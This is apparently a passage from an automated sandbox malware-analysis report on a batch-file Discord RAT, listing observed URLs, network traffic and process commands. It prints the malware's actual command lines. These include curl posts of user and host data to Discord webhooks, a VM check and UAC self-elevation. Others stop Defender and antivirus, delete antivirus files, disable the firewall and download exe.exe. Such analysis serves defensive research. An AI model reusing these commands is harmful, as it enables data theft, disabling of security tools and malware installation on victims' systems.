        Source: csc.exe, 0000000A.00000003.1488501089.0000013616791000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488254269.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488419687.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.1488742165.0000013616792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7Eu
        Source: WMIC.exe, 00000004.00000002.1453877128.0000022707420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0be
        Source: curl.exe, 0000001C.00000002.2290720682.00000219E6A60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2287844080.00000219E6780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2673504080.000002D2E0716000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTz
        Source: svchost.exe, 00000019.00000003.2260956832.000001774F121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
        Source: svchost.exe, 00000019.00000003.2260956832.000001774F0B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000009.00000002.1496227351.00000269942A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A44B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
        Source: powershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: explorer.exe, 00000017.00000003.2305006917.00000000091E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.00000000091E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.disc
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord
        Source: powershell.exe, 00000015.00000002.2166099676.0000025C19944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/1
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/12918514
        Source: powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSR
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1Ui
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 64913 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 64892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64901
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64913
        Source: unknownNetwork traffic detected: HTTP traffic on port 64897 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 64901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64897
        Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64892 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64897 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.8:64901 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64913 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected Discord Rat
        Source: Yara matchFile source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED

        System Summary

        barindex
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\Secret Document\exe.exeJump to dropped file
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4B36091E9_2_00007FFB4B36091E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7F0EBD35_2_00007FFB4E7F0EBD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFB4E7FCE6035_2_00007FFB4E7FCE60
        Source: exe.exe.32.drStatic PE information: No import functions for PE file found
        Source: classification engineClassification label: mal100.troj.expl.evad.winBAT@46/42@5/4
        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\Public\Documents\Secret DocumentJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgaifbew.1vy.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\System32\curl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer,model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "vmware virtualbox"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net session
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer,model Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "vmware virtualbox" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"Jump to behavior
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
